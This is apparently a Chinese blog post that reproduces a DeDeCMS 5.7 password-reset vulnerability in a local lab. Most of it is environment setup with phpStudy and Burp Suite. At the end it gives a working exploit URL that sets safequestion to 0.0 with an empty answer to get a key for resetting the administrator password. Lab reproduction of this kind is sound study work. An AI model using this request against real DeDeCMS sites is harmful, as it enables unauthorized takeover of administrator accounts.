织梦DeDeCMS漏洞还原
运行环境:
艰难版本:apache+php+mysql(链接放这了,太过难搞,新手用下面)
apache2.46:https://www.apachelounge.com/download/
php7.46:https://windows.php.net/download#php-7.4
mysql5.6:https://downloads.mysql.com/archives/community/
都是zip安装包解压使用。
简易版本用PHPstudy_pop(8.1)(太喜欢这东西了)
下载网址:https://www.xp.cn/download.html
这样简易版环境就建立成功了
安装DeDecms5.7 http://www.dedecms.com/products/dedecms/downloads/
百度盘:https://pan.baidu.com/s/1Qjdo2DkuazQ6opLSk091Bg 提取码:csdn(上面的下载容易抽风)
打开在Apache与mysql
将DeDecms5.7中的uploads放入phpstudy的WWW文件里(建议uploads的文件名改成dedecms,我学习找教程时大多都是用dedecms当文件名,方便一点。)
C:\phpstudy_pro\COM(这是phpstudy桌面快捷方式的右击打开文件位置)
去掉COM就可以返回phpstudy目录看到www文件
然后打开浏览器建立网站
在浏览器打开http://localhost/uploads(dedecms)
一直继续
然后
点击继续恭喜你网站建立成功
点击进入后台管理员系统(http://localhost/uploads/dede/login.php?gotopage=%2Fuploads%2Fdede%2F)
这样就可以建立其他用户了
然后建立一个新用户不设用户安全问题
至此一切准备完成
下载burpsuite
关于环境设置https://blog.csdn.net/qq_26605049/article/details/89574477(大佬的链接)
firefox(火狐)优先
firefox网络配置如下(不使用代理记得空白)
打开burpsuite
拦截开始
然后在普通用户界面网页输入(这里进入普通用户界面若报错,可以把localhost改成现在电脑网络连接的ip地址【cmd中ipconfig指令查询】)
http://localhost/uploads/member/resetpassword.php?dopost=safequestion&safequestion=0.0&safeanswer=&id=1
key就是进入时的临时验证码,这样就可以修改管理员密码了。
复现完成。
至于艰难版本的方式,太难了(头发表示不想再来一次了),但是幸好csdn大佬多【滑稽】。
谢谢观看